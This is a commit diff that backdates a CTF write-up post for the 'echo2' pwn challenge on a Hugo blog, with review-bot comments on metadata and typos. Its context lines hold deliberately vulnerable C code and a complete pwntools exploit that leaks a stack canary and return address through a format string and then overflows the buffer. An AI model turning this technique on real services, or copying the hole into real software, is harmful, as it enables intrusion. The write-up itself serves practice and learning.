Commit

timestamp
daniel committed Nov 18, 2024
1 parent 1cedb0f commit 4bcfc46
Showing 7 changed files with 15 additions and 15 deletions.
2 changes: 1 addition & 1 deletion content/posts/block-ctf-2024-echo2.md
@@ -1,6 +1,6 @@
+++
title = 'BlockCTF 2024 - pwn/echo2'
date = 2024-11-17T22:52:37-05:00
date = 2024-11-11T20:52:37-05:00
draft = false
+++
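Review bot: the `date` change in the front matter backdates the post to 2024-11-11 with no `lastmod` set, so every generated "modified" field (`article:modified_time`, `dateModified`, the sitemap `lastmod`) follows it back as well, although this commit was made on Nov 18, 2024. If the intent is only to show the original publication date, keep `date = 2024-11-11T20:52:37-05:00` and add a `lastmod` line with the real edit time, so the generated metadata still reflects when the page last changed.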

2 changes: 1 addition & 1 deletion public/index.html
Expand Up @@ -167,7 +167,7 @@ <h2 class="entry-hint-parent">BlockCTF 2024 - pwn/echo2
<p>We are given a binary with all protectoins turned on and c source code.
#include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&#34;flag.txt&#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()....</p>
</div>
<footer class="entry-footer"><span title='2024-11-17 22:52:37 -0500 EST'>November 17, 2024</span></footer>
<footer class="entry-footer"><span title='2024-11-11 20:52:37 -0500 EST'>November 11, 2024</span></footer>
<a class="entry-link" aria-label="post link to BlockCTF 2024 - pwn/echo2" href="https://dfoudeh.github.io/posts/block-ctf-2024-echo2/"></a>
</article>
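Review bot: the entry summary in the context lines of this hunk still carries the typo "protectoins" and the whole C listing flattened into one paragraph, so regenerating the page for a date change republishes both. Fix the spelling in content/posts/block-ctf-2024-echo2.md and put a `<!--more-->` summary divider after the first sentence there, so the list page shows the intro sentence rather than the source code.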

4 changes: 2 additions & 2 deletions public/index.xml
Expand Up @@ -6,12 +6,12 @@
<description>Recent content on CTF Writeups</description>
<generator>Hugo -- gohugo.io</generator>
<language>en-us</language>
<lastBuildDate>Sun, 17 Nov 2024 22:52:37 -0500</lastBuildDate>
<lastBuildDate>Mon, 11 Nov 2024 20:52:37 -0500</lastBuildDate>
<atom:link href="https://dfoudeh.github.io/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>BlockCTF 2024 - pwn/echo2</title>
<link>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</link>
<pubDate>Sun, 17 Nov 2024 22:52:37 -0500</pubDate>
<pubDate>Mon, 11 Nov 2024 20:52:37 -0500</pubDate>
<guid>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</guid>
<description>We are given a binary with all protectoins turned on and c source code.
#include &amp;lt;fcntl.h&amp;gt; #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdint.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;unistd.h&amp;gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&amp;#34;flag.txt&amp;#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo().</description>
10 changes: 5 additions & 5 deletions public/posts/block-ctf-2024-echo2/index.html
Expand Up @@ -61,8 +61,8 @@
#include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&#34;flag.txt&#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://dfoudeh.github.io/posts/block-ctf-2024-echo2/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2024-11-17T22:52:37-05:00" />
<meta property="article:modified_time" content="2024-11-17T22:52:37-05:00" />
<meta property="article:published_time" content="2024-11-11T20:52:37-05:00" />
<meta property="article:modified_time" content="2024-11-11T20:52:37-05:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="BlockCTF 2024 - pwn/echo2"/>
Expand Down Expand Up @@ -103,8 +103,8 @@
"articleBody": "We are given a binary with all protectoins turned on and c source code.\n#include #include #include #include #include void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(\"flag.txt\", O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo(). We can set a breakpoint in do_echo() after printf and enter a format string to leak the canary and an address.\nSending our format string\n%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx We leak out the stack\n5555555592a1.0.7ffff7f8b8e055555555934b.0.2e786c252e786c25.252e786c25786c25.252e786c252e786c6c25786c252e786c.6c252e786c252e78.6c252e786c252e78.786c252e786c2578.786c252e786c252e2e786c25786c252e.2e786c252e786c25.25786c252e786c25.252e786c252e786c.252e786c252e786c6c252e786c25786c.6c252e786c252e78.786c25786c252e78.786c252e786c252e.786c252e786c252e2e786c252e786c25.2e786c252e786c25.252e786c25786c25.786c.00.0.0.0.00.0.0.0.07befa8536e8aba00.7fffffffe338.5555555555b5.5555555555a1.7ffff7dc9e087fffffffe260.7fffffffe338 07befa8536e8aba00 at offset 39 looks like our canary and at offset 41 is the saved RIP. In gdb with the gef extenstoin, we can use the command ‘canary’ to print out the canary and confirm that we have the right one. Similarly we can use ‘info frame’ to see that we have the right RIP.\nThe saved RIP address is main+20. We can calculate the offset between this andress and the start of the print_flag fucntion, which is 908. 
Putting it all together:\nfrom pwn import * target = remote(\"54.85.45.101\", 8009) # leak canary payload = \"%39$lx\" target.sendline(payload) canary = int(target.recv(16),16) log.info(hex(canary)) # leak RIP payload = \"%41$lx\" target.sendline(payload) rip = int(target.recv(12),16) log.info(hex(rip)) # offset from leak to print_flag = 908 payload = b\"A\" * 264 + p64(canary) + p64(0xdeadbeef) + p64(rip - 908) target.sendline(payload) target.interactive() flag{aslr_and_canari3s_are_n0_match_f0r_l3aky_stacks}\n",
"wordCount" : "242",
"inLanguage": "en",
"datePublished": "2024-11-17T22:52:37-05:00",
"dateModified": "2024-11-17T22:52:37-05:00",
"datePublished": "2024-11-11T20:52:37-05:00",
"dateModified": "2024-11-11T20:52:37-05:00",
"mainEntityOfPage": {
"@type": "WebPage",
"@id": "https://dfoudeh.github.io/posts/block-ctf-2024-echo2/"
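Review bot: the `articleBody` context line in this hunk quotes the canary as `07befa8536e8aba00`, which is 17 hex digits and cannot be a single 64-bit `%lx` value; the format string shown omits the `.` between some `%lx` conversions, so a preceding `0` is fused onto `7befa8536e8aba00`. Since the post is being regenerated anyway, correct that value in the source markdown together with the spelling of "protectoins", "extenstoin", "andress" and "fucntion". The `#include` lines in this field have also lost their header names, which suggests the angle-bracket text was stripped as markup.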
Expand Down Expand Up @@ -174,7 +174,7 @@
<h1 class="post-title entry-hint-parent">
BlockCTF 2024 - pwn/echo2
</h1>
<div class="post-meta"><span title='2024-11-17 22:52:37 -0500 EST'>November 17, 2024</span>
<div class="post-meta"><span title='2024-11-11 20:52:37 -0500 EST'>November 11, 2024</span>

</div>
</header>
2 changes: 1 addition & 1 deletion public/posts/index.html
Expand Up @@ -143,7 +143,7 @@ <h2 class="entry-hint-parent">BlockCTF 2024 - pwn/echo2
<p>We are given a binary with all protectoins turned on and c source code.
#include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&#34;flag.txt&#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()....</p>
</div>
<footer class="entry-footer"><span title='2024-11-17 22:52:37 -0500 EST'>November 17, 2024</span></footer>
<footer class="entry-footer"><span title='2024-11-11 20:52:37 -0500 EST'>November 11, 2024</span></footer>
<a class="entry-link" aria-label="post link to BlockCTF 2024 - pwn/echo2" href="https://dfoudeh.github.io/posts/block-ctf-2024-echo2/"></a>
</article>

4 changes: 2 additions & 2 deletions public/posts/index.xml
Expand Up @@ -6,12 +6,12 @@
<description>Recent content in Posts on CTF Writeups</description>
<generator>Hugo -- gohugo.io</generator>
<language>en-us</language>
<lastBuildDate>Sun, 17 Nov 2024 22:52:37 -0500</lastBuildDate>
<lastBuildDate>Mon, 11 Nov 2024 20:52:37 -0500</lastBuildDate>
<atom:link href="https://dfoudeh.github.io/posts/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>BlockCTF 2024 - pwn/echo2</title>
<link>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</link>
<pubDate>Sun, 17 Nov 2024 22:52:37 -0500</pubDate>
<pubDate>Mon, 11 Nov 2024 20:52:37 -0500</pubDate>
<guid>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</guid>
<description>We are given a binary with all protectoins turned on and c source code.
#include &amp;lt;fcntl.h&amp;gt; #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdint.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;unistd.h&amp;gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&amp;#34;flag.txt&amp;#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo().</description>
6 changes: 3 additions & 3 deletions public/sitemap.xml
Expand Up @@ -3,13 +3,13 @@
xmlns:xhtml="http://www.w3.org/1999/xhtml">
<url>
<loc>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</loc>
<lastmod>2024-11-17T22:52:37-05:00</lastmod>
<lastmod>2024-11-11T20:52:37-05:00</lastmod>
</url><url>
<loc>https://dfoudeh.github.io/</loc>
<lastmod>2024-11-17T22:52:37-05:00</lastmod>
<lastmod>2024-11-11T20:52:37-05:00</lastmod>
</url><url>
<loc>https://dfoudeh.github.io/posts/</loc>
<lastmod>2024-11-17T22:52:37-05:00</lastmod>
<lastmod>2024-11-11T20:52:37-05:00</lastmod>
</url><url>
<loc>https://dfoudeh.github.io/posts/du-ctf-2024-yawa/</loc>
<lastmod>2024-07-07T10:47:36-04:00</lastmod>
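Review bot: six of the seven files in this commit, this sitemap included, are Hugo output under public/ and only repeat the one-line front matter change, which makes the diff harder to review and lets the generated copies drift from the source. Consider building public/ in the deploy step and leaving it out of the repository, so a date fix like this is a single-line commit.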